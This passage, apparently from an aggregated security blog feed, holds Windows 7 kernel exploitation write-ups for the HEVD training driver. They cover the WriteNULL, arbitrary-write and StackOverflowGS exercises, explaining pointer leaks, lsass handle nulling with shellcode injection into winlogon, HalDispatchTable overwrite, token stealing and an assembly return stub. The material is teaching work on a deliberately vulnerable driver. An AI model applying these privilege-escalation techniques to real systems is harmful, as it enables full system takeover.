    Alternatively a real pointer may be given as the handle when the API writer intends that the user of the API be insulated from the specifics of what the address returned points to; in this case it must be considered that what the handle points to may change at any time (from API version to version or even from call to call of the API that returns the handle) — the handle should therefore be treated as simply an opaque value meaningful only to the API.

    In short, “handles” have properties to create and configure communications through objects (open files, apis, pipes), on “Operation System (OS)”. These handles are carrying a bunch of information about these objects, one of them are pointers. Basically, “handles” loads pointers, but do you know the best part of it? is the possibility to “leak” these pointer from “ring3 (user-land)”, and that’s what we need to deep our look.

    Knowing that, “NtQuerySystemInformation” afford a lot interesting calls, on top of that, we have an undocumented call named “SystemExtendedHandleInformation”, which supports the follow structs.

    SYSTEM_HANDLE_TABLE_ENTRY_INFO
    SYSTEM_HANDLE_INFORMATION

    These structs, should help us to leak “handle pointers”, and that’s how the magic starts.

    Utilizing the designed flaw calls, let me fuzz some handle data from “ring3 (user-mode)” perspective and see what happens.

    Piece of code to leak handles data
    This part will loop all handles and get his data
    Script running and leaking pointers from ring3 (user-land) (PID:444)
    Script running and leaking pointers from ring3 (user-land) (PID:1240)
    [11931] Leaked pointers found it

    As you can see, from a simple user we actually can leak a lot of pointers and data. The best part of it, is that one of those pointers are correlated to our “PROCESS object”, did you remember?

    WinDBG processes list

    This is it, that’s the trick! But there’s a problem. Assuming that many restrictions such as: “ASLR”, are configured by default, how we knows what addresses, PID’s and Handle values are correct in order to predict that one who contains our “PROCESS object” pointer?

    The answer for this question is: “I don’t know, but there’s a method (really no stealth), which work as well!”. This method was discovered after tests assuming “ASLR randomization” and what processes (who contains useful pointers), should crash after been nullified through exploitation technique.

    After some tests, it was noticed that if we define “lsass.exe PID”, as the only target to have his handles nullified, the “Operation System OS” doesn’t crashes (I assume that because “lsass.exe” isn’t a process that contains so many handles for “SYSTEM internals”, only to hold permissions and things related on this). After all, with “lsass.exe” handle pointers nullified, it’s clearly that not only 1 process will have “write/read/execute permission”, but also a lot. That’s why i don’t recommend this technique for a real world exploitation because isn’t safe (also not stealthy), nullifying “handles” could make the Operation System crash and reboot.

    Source-code modified in order to filter only handles from “lsass.exe” PID
    Source-code modified in order to filter only handles from “lsass.exe” PID

    The things is, once “SYSTEM processes” do have access permissions for “Anyone”, the final part should be a “Shellcode Injection” in a SYSTEM target process, and that’s what we do in “winlogon.exe”. This process is running with SYSTEM permissions (and now after nullify attack “write/read/execute”)

    So, putting all together, this is how it looks like. =D

    Nullifying “lsass.exe” handle pointers “SecurityDescription”, and injecting “LPE shellcode” at “winlogon.exe” process.

    After exploit runs, we finally got our “nt authority/SYSTEM cmd.exe shell”, nothing was crashed and processes work as well without issues.

    The final consideration for this write-up, is that i didn’t found any reliable solution for WriteNULL challenge, only one which uses another driver vulnerability in order to leak pointer address (in references), meaning that this exploit should be the only one existing in internet utilizing this technique (really no one want to do this). =(

    So, it was kind fun and hope everyone enjoyed this write-up. =P

    Final Exploit link:
    https://github.com/w4fz5uck5/3XPL01t5/tree/master/OSEE_Training/HEVD_exploits/windowsx86/%5BHEVD%5D-WriteNULL
    References:
    https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/HackSysExtremeVulnerableDriver.h
    https://github.com/daem0nc0re/HEVD-CSharpKernelPwn/blob/master/HEVD_Win7x86/WriteNull/Program.cs http://bprint.rewolf.pl/bprint/?p=1683
    https://github.com/ZecOps/CVE-2020–0796-LPE-POC/blob/master/poc.py
    https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/windows-debugging-and-exploiting-part-4-ntquerysysteminformation/

    An in-depth look at hacking back, active defense, and cyber letters of marque

    17 November 2021 at 19:16

    There has been much discussion in cyber security about the possibility of enabling the private sector to engage in active cyber defense, or colloquially “hacking

    The post An in-depth look at hacking back, active defense, and cyber letters of marque appeared first on MalwareTech.

    Improving the write-what-where HEVD PoC (x86, Win7)

    17 October 2021 at 20:12

    Introduction

    This one is about another HEVD exercise (look here to see the my previous HEVD post); the arbitrary write (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c). The main reason I decided to write up my experience with it is the fact that it instantly occurred to me that the official exploitation process, used both in the original PoC as well as described here, leaves the kernel in an unstable state with high probability of crash anytime after the exploit is run. So, this post is more about the exploitation technique, the problem it creates and the solution it asks for, rather than the vulnerability itself. It also occurred to me that doing HEVD exercises fully (like understanding exactly what and how) is quite helpful in improving the general understanding of how the operating system works.

    When it comes to stuff like setting up the environment, please refer to my earlier HEVD post. Now let's get started.

    The vulnerability

    This one is a vanilla write-what-where case - code running in kernel mode performs a write operation of an arbitrary (user-controlled) value into an arbitrary (user-controlled) address. In case of a x86 system (we keep using these for such basic exercises as they are easier while debugger output with 32-bit addresses is more readable), it usually boils down to being able to write an arbitrary 32-bit value into an arbitrary 32-bit address. However, it is also usually possible to trigger the vulnerability more than once (which we will do in this case, by the way, just to fix the state of the kernel after privilege escalation), so virtually we control  data blocks of any size, not just four bytes.

    First of all, we have the input structure definition at https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/ArbitraryOverwrite.h - it's as simple as it could be, just two pointers:

    Then, we have the TriggerArbitraryWrite function in https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/ArbitraryWrite.c (screenshot below). First, we have a call to ProbeForRead on the input pointer, to make sure that the structure itself is located in user space (both ProbeForRead and ProbeForWrite methods throw an access violation exception if the address provided turns out to belong to the kernel space address range). Then, What and Where values held by the structure (note that these are both pointers and there are no additional checks here whether the addresses those pointers contain belong to kernel or  user space!) are copied into the local kernel mode function variables:

    Then, we have the vulnerable write-what-where:

    Now, let's see how this C code actually looks like after it's compiled (disassembly view in windbg):

    Exploitation

    So, as always, we just want to run our shellcode in kernel mode, whereas the only thing our shellcode does is overwriting the security token of our exploit process with the one of the SYSTEM process (token-stealing shellcode).  Again, refer to the previous blog post https://hackingiscool.pl/hevd-stackgs-x86-win7/ to get more details on the shellcode used.

    To exploit the arbitrary write-what-where to get our shellcode executed by the kernel, we want to overwrite some pointer, some address residing in the kernel space, that either gets called frequently by other processes (and this is what causes trouble post exploitation if we don't fix it!) or is called by a kernel-mode function that we can call from our exploit process (this is what we will do to get our shellcode executed). In this case we will stick to the HalDispatchTable method - or to be more precise, HalDispatchTable+0x4. The method is already described here https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html (again, I recommend this read), but let's paraphrase it.

    First, we use our write-what-where driver vulnerability to overwrite 4 bytes of the the nt!HalDispatchTable structure (nt!HalDispatchTable at offset 0x4, to be exact). This is because the NtQueryIntervalProfile function - a function that we can call from user mode - results in calling nt!KeQueryIntervalProfile (which already happens after switching into kernel mode), and that function calls whatever is stored at nt!HalDispatchTable+0x4:

    So, the idea is to first exploit the arbitrary write to overwrite whatever is stored at nt!HalDispatchTable+0x4 with the user-mode address of our shellcode, then call the NtQueryIntervalProfile only to trick the kernel into executing it via calling HalDisaptchTable+0x4 - and it works like a charm on Windows 7 (kernel mode execution of code located in user mode buffer, as no SMEP in place).

    The problem

    The problem is that nt!HalDispatchTable is a global kernel structure, which means that once we tamper it, it will still be there if any other program refers to it (e.g. calls NtQueryIntervalProfile). And it WILL affect whatever we will be doing enjoying our SYSTEM privileges, because it WILL crash the entire system.

    Let's say that the buffer holding our shellcode in our user mode exploit is at 00403040. If we overwrite the original value of nt!HalDispatchTable+0x4 with it, that shellcode will only be reachable and thus callable if the current process being executed is our exploit. Once the scheduler interrupt switches the current CPU core to another process, in the context of that process the user mode virtual address of 00403040 will either be invalid (won't even fall into any committed/reserved virtual address range within the virtual address space used by that process) or it will be valid as an address, but in reality it will be mapped to a different physical address, which means it will hold something completely different than our shellcode. Remember, each process has its own address space, separate from all other processes, whereas the address space of the kernel is global for the entire system. Therefore every kernel space address makes sense to the entire system (kernel and all processes), whereas our shellcode at 00403040 is only accessible to our exploit process AND the kernel - but only when the process currently being executed is our exploit. The same address referred to from a different process context will be invalid/point at something completely different.

    So, after we tamper HalDispatchTable+0x4 by overwriting it with the address of the shellcode residing in the memory of the current process (our exploit) and call NtQueryIntervalProfile to get the shellcode executed, our process should now have SYSTEM privileges (and so will any child processes it spawns, e.g. a cmd.exe shell).

    Therefore, if any other process in the system, after we are done with privilege escalation, calls NtQueryIntervalProfile, it will as well trick the kernel into trying to execute whatever is located under the 00403040 address. But since the calling process won't have this address in its working set or will have something completely different mapped under it, it will lead to a system crash. Of course this could be tolerated if we performed some sort of persistence immediately upon the elevation of privileges, but either way as attackers we don't want disruptions that would hurt our customer or potentially tip the defenders off. We don't want system crashes.

    This is not an imaginary problem. Right after running the initial version of the PoC (which I put together based on the official HEVD PoC), all of the sudden I saw this in windbg:

    Obviously whatever was located at 0040305b  at the time ( 000a - add byte ptr [edx],cl), was no part of my shellcode. So I did a quick check to see what was the process causing this - by issuing the !vad command to display the current process VADs (Virtual Address Descriptors), basically the memory map of the current process, including names of the files mapped into the address space as mapped sections - which includes the path to the original EXE file:

    One of svchost.exe processes causing the crash by calling HalDispatchTable+0x4

    One more interesting thing is that - if we look at the stack trace (two screenshots above) - the call of HalDispatchTable+0x4 did not originate from KeQueryIntervalProfile function, but from nt!EtwAddLogHeader+0x4b. Which suggests that  HalDispatchTable+0x4 is called from more places than just NtQueryIntervalProfile, adding up to the probability of such a post-exploitation crash being very real.

    The solution

    So, the obvious solution that comes to mind is restoring the original HalDispatchTable+0x4 value after exploitation. The easiest approach is to simply trigger the vulnerability again, with the same "where" argument ( HalDispatchTable+0x4) and a different "what" argument (the original value as opposed to the address of our user mode shellcode).

    Now, to be able to do this, first we have to know what that original value of nt!HalDispatchTable+0x4 is. We can't try to read it in kernel mode from our shellcode, since we need to overwrite it first in order to get the shellcode execute in the first place. Luckily, I figured out it can be calculated based on information attainable from regular user mode execution (again, keep in mind this is only directly relevant to the old Windows 7 x86 I keep practicing on, I haven't tried this on modern Windows yet, I know that SMEP and probably CFG would be our main challenges here).

    First of all, let's see what that original value is before we attempt any overwrite. So, let's view nt!HalDispatchTable:

    The second DWORD in the memory block under nt!HalDispatchTable contains 82837940. Which definitely looks like an address in kernel mode. It has to be - after all, it is routinely called from other kernel-mode functions, as code, so it must point at kernel mode code. Once I called it up with dt command, windbg resolved it to HaliQuerySystemInformation. Running disassembly view command uu on it, revealed the full symbol name (hal!HaliQuerySystemInformation) and showed that in fact there is a function there (just based on the first few assembly lines we can see it is a normal function prologue).

    OK, great, so we know that nt!HalDispatchTable+0x4, the pointer we abuse to turn arbitrary write into a privilege escalation, originally points to a kernel-mode function named hal!HaliQuerySystemInformation (which means the function is a part of the hal module).

    Let's see more about it:

    Oh, so the module name behind this is halacpi.dll. Now we both have the function name and the module name. Based solely on this information, we can attempt to calculate the current address of hal!HaliQuerySystemInformation dynamically. To do this, we will require the following two values:

    1. The current base address the halacpi.dll module has been loaded (we will get it dynamically by calling NtQuerySystemInformation from our exploit).
    2. The offset of the HaliQuerySystemInformation function within the halacpi.dll module itself (we will pre-calculate the offset value and hardcode it into the exploit code - so it will be version-specific). We can calculate this offset in windbg by subtracting the current base address of the halacpi.dll kernel-mode module (e.g. taken from the lmDvmhal command output) from the absolute address of the  hal!HaliQuerySystemInformation function as resolved by windbg. We can also calculate (confirm) the same offset with static analysis - just load that version of halacpi.dll into Ghidra, download the symbols file, load the symbols file, then find the static address of the function with its address within the binary and subtract the preferred module base address from that address.

    Below screenshot shows the calculation done in windbg:

    Calculating the offset in windbg

    Below screenshots show the same process with Ghidra:

    Preferred image base - 00010000
    Finding the function (symbols must be loaded)
    HaliQuerySystemInformation static address in the binary (assembly view)

    Offset calculation based on information from Ghidra: 0x2b940 - 0x10000 = 0x1b940.

    So, during runtime, we need to add 0x1b940 (for this particular version of halacpi.dll - remember, other versions will most likely have different offsets) to the dynamically retrieved load base address of halacpi.dll, which we retrieve by calling NtQuerySystemInformation and iterating over the buffer it returns (see the PoC code for details). The same function, NtQuerySystemInformation, is used to calculate the runtime address of the HalDispatchTable - the "what" in our exploit (as well as the  original HEVD PoC code and many other exploits of this sort). In all cases  NtQuerySystemInformation is called to get the current base address of the ntoskrnl.exe module (the Windows kernel). Then, instead of using a hardcoded (fixed) offset to get HalDispatchTable, a neat trick with LoadLibraryA and GetProcAddress is used to calculate it dynamically during runtime (see the full code for details).

    The reason I could not reproduce this fully dynamic approach of calculating the offset from the base (calling LoadLibrary(halacpi.dll) and then GetProcAddress(HaliQuerySystemInformation)) to calculate hal!HaliQuerySystemInformation and used a hardcoded, fixed, manually precalculated 0x1b940 offset instead, is because the HaliQuerySystemInformation function is not exported by halacpi.dll - whereas GetProcAddress only works for functions that have their corresponding entries present in the DLL Export Table.

    Full PoC

    The full PoC I put together can be found here: https://gist.github.com/ewilded/4b9257b552c6c1e2a3af32879f623803.

    nt/system shell still running after the exploit process's exit
    The original HalDispatchTable+0x4 restored after exploit execution

    HEVD StackOverflowGS x86 Win7 - exploitation analysis

    5 October 2021 at 06:00

    Introduction

    This post is about kernel mode exploitation basics under Windows. It operates on assumptions that the reader is familiar with terms such as process, thread, user and kernel mode and the difference between user and kernel mode virtual address range. One could use this post as an introduction to HEVD.

    Even though I came across at least one good write up about Hacksys Extreme Vulnerable Driver StackOverflowGS (https://klue.github.io/blog/2017/09/hevd_stack_gs/, highly recommend it), after reading it I still felt that I did not understand the entire exploitation process (did not notice the link to the source code at the time :D), so I fell back on the PoC provided by HEVD (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c), analyzed it and learned a few things, now I am just sharing my insights and tips.

    Setup

    There are numerous resources on how to set up Windows kernel debugging and install HEVD (e.g. https://hshrzd.wordpress.com/2017/05/28/starting-with-windows-kernel-exploitation-part-1-setting-up-the-lab/ and https://hshrzd.wordpress.com/2017/06/05/starting-with-windows-kernel-exploitation-part-2/).

    I personally prefer using my host OS as the debugger and a VirtualBox VM as the debuggee (Windows 7, x86).

    VM setting of the serial port for debugging

    To attach to the VM, I run the following command (make sure windbg.exe is in your %PATH%):

    windbg -k com:pipe,port=\.\pipe\com_1,resets=0,reconnect

    When successfully attaching a debuggee, windbg output will look like this:

    I myself have experienced issues when rebooting the debuggee (which happened a lot with all the crashes resulting from my attempts at exploitation) with windbg running; it just didn't want to attach to the named pipe and thus there was no connection between windbg and the debuggee. Also, trying to attach to a VM that was already running didn't work this way either. I figured that for me everything always works as should when I first boot the VM and then, once the OS loading progress bar pops up, I run the command to spawn windbg and make it connect to the named pipe created by VirtualBox.

    Also, don't forget to load the symbols, e.g.:

    .sympath C:\Users\ewilded\HACKING\VULNDEV\kernel\windows\HEVD\HEVD.1.20\drv\vulnerable\i386;SRVC:\SymbolsServerhttps://msdl.microsoft.com/download/symbols

    The vulnerability

    StackOverflowGS (code here https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStackGS.c) is a vanilla stack-based buffer overflow, just like StackOverflow (code here https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStack.c). The only difference is that in this case stack smashing is detected via a stack canary/stack cookie (a good introduction to the subject can be found here).

    All HEVD exercises have the same structure and are all called in the same manner.

    Whenever a user wants to interact with the module, they send the driver a data structure -  IRP (https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/i-o-request-packets). This data structure is our malicious input vector.

    On line 128 of the HackSysExtremeVulnerableDriver.c main driver source file, we can see that IrpDeviceIoCtlHandler function is assigned to IRP_MJ_DEVICE_CONTROL packets:

    That function can be found in the same file, starting with line 248:

    Depending on the IOCTL code (an unsigned long integer argument, part of the IRP), IrpDeviceIoCtlHandler runs a different function:

    Constants like HEVD_IOCTL_BUFFER_OVERFLOW_STACK are numeric variables predefined in HackSysExtremeVulnerableDriver.h.

    So each exercise has its corresponding function with "IoctlHandler" suffix in its name (BufferOverflowStackIoctlHandler, BufferOverflowStackGSIoctlHandler and so on). Let's see what this function looks like in our case (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStackGS.c):

    So there is another function, named TriggerBufferOverflowStackGS, run from BufferOverflowStackGSIoctlHandler. So the function call tree, starting from IrpDeviceIoCtlHandler, is now:

    Finally, the function is pretty simple too:

    UserBuffer is a pointer to the user mode memory block (valid in the address space of the process that is currently interacting with the driver). Kernel mode code will be reading data from this location.

    Size is an integer telling HEVD how many bytes we want it to read from the UserBuffer memory block - and write to kernel memory, starting at KernelBuffer. KernelBuffer is a local variable (defined on line 72 visible in the screenshot above), so it resides on the stack.

    Both the UserBuffer pointer and the Size are delivered with the IRP and controlled by the user mode program that created it and triggered an interrupt to communicate with this driver (we'll get to that code too, shortly).

    Then we get to the bottom of this:

    So basically it's a vanilla stack-based buffer overflow. We can overwrite KernelBuffer with UserBuffer, with Size bytes (we control both UserBuffer and Size).

    Let's set up a breakpoint in windbg, at HEVD!TriggerStackOverflowGS:

    By listing the breakpoint (bl) we can see the current kernel mode address of the function (87e3f8da), which will vary between platforms and system boots.

    View the disassembly of the entire function we can notice two important points in the code:

    First is our vulnerable memcpy call, the second is the SEH_epilog4_GS, the function responsible for checking the saved stack canary and preventing from normal returning if the stack was detected to be smashed (if the cookie doesn't match), aimed at preventing exploitation.

    Naturally, a breakpoint at 87e3f964 e871c8ffff      call    HEVD!memcpy (87e3c1da) would be more precise, as we could see directly how the stack buffer looks like before and after memcpy executes. Let's set it:

    By listing the existing breakpoints again, we can see that windbg neatly displays both addresses using properly resolved symbols, so our second breakpoint set using the address 87e3f964 got nicely resolved to HEVD!TriggerStackOverflow+0x8a. I personally prefer to save these, so I can use them later when running again, just to remember where the actual breakpoint I am interested in is.

    Now, we need to interact with the driver in order to see how the buffer we supply is stored on the stack, what do we overwrite and how error conditions we cause this way will differ depending on the buffer size.

    For this purpose, I assembled a simple piece of C code based on other existing HEVD PoCs (I use Dev-C++) https://gist.github.com/ewilded/1d015bd0387ffc6ee1284bcb6bb93616:

    • it offers two payload types; a string of A-s or up to 3072 bytes of de Brujin sequence,
    • it asks for the size argument that will be sent over to the driver.

    Below screenshot demonstrates running it in order to send a 512-byte buffer filled with 'A':

    At this point we should hit the first breakpoint. We just let it go (g) and let it hit the second breakpoint (just before memcpy):

    Let's see the stack:

    Now, let's just step over once (p), so we get to the next instruction after the memcpy call, and examine the stack again:

    So we can clearly our 512-byte buffer filled with 'A'. Now, at this point there is no buffer overflow.

    Now, the next value on stack, right after that buffer (in this case 070d99de), is the stack cookie.

    By the way, this is a good opportunity to notice the call stack (function call tree):

    We can see that our saved return address is 87e3f9ca (HEVD!TriggerStackOverflowGS+0x8f)(red). The SEH handler pointer we will overwrite is sitting between the stack cookie and the saved RET (green):

    If we let it running further (g), we can see nothing happens and fuzz.exe returns:

    Good, as the buffer was 512, there was no overflow, everything returned cleanly.

    Now, let's see what happens when we increase the buffer size by just one:

    First two breakpoints hit, nothing to see yet:

    Now, let's step over (p or F10) and see the stack again. This time we overwrote the stack cookie, by one byte (0d9bb941):

    Now, let's let the debuggee go and see what happens (also, note the !analyze -v link generated in windbg output - click on it/run the command to see more details about the crash):

    We end up with a fatal error 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER), which means that the __SEH_epilog4_GS function detected the change in the cookie saved on the stack and triggered a fatal exception.

    Just as expected.

    It is important to pay close attention to the error code, especially in this case: 0x000000f7 (DRIVER_OVERRAN_STACK_BUFFER) looks a lot like 0x0000007f (DOUBLE_TRAP), whereas the second one basically means that some sort of exception was triggered while already executing some exception handler - in other words, it means that after one exception, the code handling the exception encountered another exception. Distinguishing between these two (easy to mix up) is crucial while developing this exploit, as while the first one indicates that the stack cookie was overwritten and that the SEH __SEH_epilog4_GS has executed and detected the tampering to prevent exploitation. On the other hand, 0x0000007f (DOUBLE_TRAP) indicates that we triggered an exception and that afterwards another exception was raised. We can trigger an access violation by providing sufficiently large value of the Size argument in an IRP, causing the kernel-mode memcpy call to either read beyond the page of the user-mode process working set, or write beyond the kernel stack, depending on which happens first).

    Exploitation approach

    When it comes to stack cookies, there are several bypass scenarios.

    The stack cookie could be leaked by exploiting another vulnerability (chaining, just like in one of my previous write ups) and then used in the payload to overwrite the original value of the canary cookie with the original value, making the entire stack-smashing invisible to the stack canary-checking routine called in the function's epilogue.

    Another chaining method involves overwriting the process-specific pseudo-random value of the current cookie in the process memory, wherever it is stored (depending on the OS and compiler).

    And then finally there is the third exploitation approach, abusing the fact that exception handlers are executed before the stack cookie is checked. Sometimes it is possible to abuse exception handling code - in this case a SEH handler pointer, which is also stored on the stack in a location we can overwrite. The idea is to abuse the memory corruption vulnerability in such a way that we overwrite a pointer to an exception handler and then we trigger an exception within the same function, before the stack checking routine in the function's epilogue is executed. This way we redirect the execution to our payload (our shellcode), which first elevates our privileges (in this case, as it's a local kernel EoP exploit), then returns to the parent function (the function that called the function we are exploiting - the parent in the call stack/call tree), without ever running the stack cookie-checking routine.

    Again, please refer to https://dl.packetstormsecurity.net/papers/bypass/defeating-w2k3-stack-protection.pdf for more details on the general subject of defeating stack cookies under Windows.

    HEVD official PoC

    The tricky part in this exercise is that we have to do both things with one input (one device interaction, one IRP with a buffer pointer and size, one call of the TriggerStackOverflowGS function); overwrite the pointer to the SEH exception handler AND cause an exception that the handler would be used for.

    The only viable option here is to cause the vulnerable memcpy call itself first  overwrite the buffer along with the saved stack cookie and the SEH handler pointer AND trigger an access violation exception - either due to exceeding the size of the user mode buffer and reading past the memory page that holds it, or by writing past the stack boundary (whichever happens first). Now, writing down the stack would completely wipe out all the older (parent) stack frames, making it super hard to return from the shellcode in a way that would avoid crashing the system. Thus, having the kernel code read past the user-supplied user mode buffer is a much better option - and I really like the way this has been solved in the original HEVD PoC (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c).

    The entire payload that is introduced into the kernel buffer (bytes we write to the stack) is 532 bytes long. It's 512 bytes of the original buffer, 4 bytes of the stack cookie, 12 bytes of other 3 DWORDs that we don't care about (in the payload referred to as junk) and then finally 4 bytes of the SEH handler. 512 + 4 + 12 + 4 = 532. This is the exact number of bytes that need to be written to the stack for the SEH handler pointer to be overwritten with a value we control.

    Now, in order to trigger an access violation exception in the same operation (memcpy), just after our 532 bytes from our user mode buffer were copied into the kernel mode stack, we want to place our 532-byte payload at the end of a page (the basic memory allocation unit provided by the OS memory manager, 4096 bytes by default). So from our user mode program, we allocate a separate page (4096-byte buffer). Then we put our payload into its tail (last 532 bytes) - so our payload starts on the 3565-th byte and ends on the 4096-th (the last 4 bytes being the pointer to our shellcode).

    Finally, to trigger an access violation, we adjust the buffer size parameter sent encapsulated in the IRP, to exceed the size of our payload (so it must be bigger than 532, e.g. 536). This will cause memcpy running in kernel mode to attempt reading four bytes beyond the page our payload is located in. To make sure this causes an access violation, the page must not have an adjacent/neighbor page. So for example, if the virtual address of the user mode page allocated for the buffer with our payload is 0x00004000, with page size being 0x1000 (4096), the valid address range for this page will be 0x00004000 <--> 0x00004fff. Meaning that accessing address 0x00005000 or higher would mean accessing another page starting at 0x00005000 (thus we call it an adjacent/neighbor page). Since we want to achieve an access violation, we need to make sure that no memory is allocated for the current (exploit) process in that range. So we want just one, alone page allocated, reading past which causes an access violation.

    There are a few ways to cause such a violation. For example, two adjacent pages can be allocated, then the second one could be freed, then the read operation is triggered on the first one, with the size operand making it read beyond the first page, entering the second one. And this is the method employed by klue's PoC: https://github.com/klue/hevd, with his mmap and munmap wrappers around NtAllocateVirtualMemory and NtFreeVirtualMemory.

    Another one is to allocate the page in a way that ensures nothing else is allocated in the adjacent address space, which is what the official HEVD exploit does by using an alternative memory allocation method supported by Windows.

    Let's  analyze the code (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/StackOverflowGS.c).

    First, we have declarations. hFile is used for opening the driver object (in order to then send the IRP) . PageSize is 0x1000 (4096). MemoryAddress is the pointer to the special page we are going to allocate our stack-smashing payload (528 bytes of junk, 4 bytes overwriting the SEH handler pointer, pointing at our shellcode, located at the page's tail, starting at 3565-th byte). SuitableMemoryForbuffer is the pointer we are going to pass to HEVD as the UserBuffer. It will point at the 3565-th byte of the 4096-byte page allocated at MemoryAddress. EopPayload is another pointer, another location in user mode, containing our shellcode (so the shellcode is in a separate user mode buffer than the special page we are allocating for the stack-smashing payload):

    Variable declarations

    Finally, there is SharedMemory - a handle to the mapped file object we are going to create (as an alternative way of allocating memory). Instead of requesting a new page allocation with VirtualAlloc, an empty, non-persisted memory mapped file is created. Memory-mapped files are basically section objects (described properly in Windows Internals, Part 1, "Shared memory and mapped files" section), a mechanism used by Windows for sharing memory between processes (especially shared libraries loaded from the disk), also please see the official Microsoft manual to find out more about https://docs.microsoft.com/en-us/dotnet/standard/io/memory-mapped-files).

    In this case, we are going to request creation of a "mapped-file" object without any file, by providing an INVALID_HANDLE_VALUE as the first argument to CreateFileMappingA - this scenario is mentioned in the manual page of this function (https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga):

    So it's basically a section ("mapped file") object only backed by the system paging file - in other words, a region in the system paging file that we can map to our process's address space and use just like (almost) a regular page:

    Creation of a mapped file object

     Now, we map that region to our address space:

    Mapping the object to the current process address space

    Now, we're setting the SuitableMemoryForBuffer pointer at 3565-th byte of the SharedMemoryAddress region (this is where we will locate our 532-byte payload that will be then copied by the driver to a buffer on its stack):

    Setting the payload pointer at 3565-th byte of the 4096 memory region

    And we will the entire region with 'A':

    Filling the entire 4096-byte region with 'A'

    Then eventually, the payload is finished by setting its last 4 bytes to contain the user mode address of the shellcode (these bytes will overwrite the SEH handler). This is done in a bit indirect way, as first the pointer (MemoryAddress) is set at offset 0x204 (516) - right past the xored stack cookie - and overwrites 3 of the following junk pointers, only to eventually set the new value for the SE handler:

    Grooming the buffer - this is tricky

    It seems that simply setting the MemoryAddress to point at SuitableMemoryForBuffer + 0x210 directly (to point it at the location that will overwrite the SE handler pointer) would do the trick as well - other locations on the stack would be overwritten with meaningless 'A's anyway:

    Then finally, we trigger the creation of our IRP and send it to the driver along with pointers to the UserBuffer (SuitableMemoryForBuffer - 3656-th byte of the 4096-byte region) and the Size argument; SeHandlerOverwriteOffset + RAISE_EXCEPTION_IN_KERNEL_MODE. SeHandlerOverwriteOffset is just the size of our payload (532). Then, a constant RAISE_EXCEPTION_IN_KERNEL_MODE is added to the size - it's just a numeric constant of 0x4 - and it's only to make the size argument exceed 4096 when added to the 3656-th byte being provided as the beginning of the buffer to read from:

    Finally, talking to the driver

    Shellcode

    Our shellcode being a separate buffer in user mode, which will get executed by kernel mode HEVD code, instead of the legitimate exception handler - on modern kernels this would not get executed due to SMEP, but we're doing the very basics here.

    First of all, let me recommend ShellNoob. It's a neat tool I always use whenever I want to:

    • analyze a shellcode (a sequence of opcodes) or a just some part of it,
    • write shellcode.

    In this case we will use a slightly modified version of the publicly available, common Windows7 token-stealing payload (https://github.com/hasherezade/wke_exercises/blob/master/stackoverflow_expl/payload.h):

    After converting the shellcode to ascii-hex and pasting it to shellnoob input (opcode_to_asm), this is what we get:

    Our shellcode, executing in kernel mode, finds the SYSTEM process and then copies its access token over the token of the exploit process. This way the exploit process becomes NT AUTHORITY/SYSTEM. Have a look into https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c to see descriptions of all individual assembly instructions in this payload. Pay attention to the fact that while shellnoob output presents assembly in AT&T syntax, Payloads.c contain assembly in Intel syntax (this is why it's worth to know both, http://staffwww.fullcoll.edu/aclifton/courses/cs241/syntax.html).

    This shellcode, however, requires one more adjustment.

    Clean return

    Now, the problem is, if we simply use this shellcode to exploit this particular vulnerability, the kernel will crash right after modifying relevant access token. The reason for this is the return process and messed up stack. The problem - and the solution - are already well described at https://klue.github.io/blog/2017/09/hevd_stack_gs/. I myself had to get my head around the process my own way to fully understand it and confirm (instead of just blindly running it and trusting it would work), that in fact the return stub provided by klue is going the correct one:

    mov 0x78c(%esp), %edi
    mov 0x790(%esp), %esi
    mov 0x794(%esp), %ebx
    add $0x9b8, %esp
    pop %ebp
    ret $0x8

    So, the following return stub

    had to be replaced. Again, I used shellnoob to obtain the opcodes:

    Basically the entire problem boils down to the fact that we need to return to somewhere - and when we do, the stack needs to be aligned the same way as it would normally be during normal execution.

    The entire process of aligning the stuck boils down to three things. First, identifying, where we will be returning - and taking notice of what the stack and the registers look like when return to that location is made normally. Second, setting a breakpoint in our shellcode, to again take notice of what the stack and the registers look like when our shellcode executes (it's convenient to use hardcoded software breakpoint in the shellcode itself - just append it with 0xcc (int3) instead of the return stub). Third, comparing the state of the registers and the stack between the two stages, finding where the register values to restore are in memory, restore them, then finally adjust the last one of them (ESP) and make the return.

    Running

    Source code can be found here.

    ❌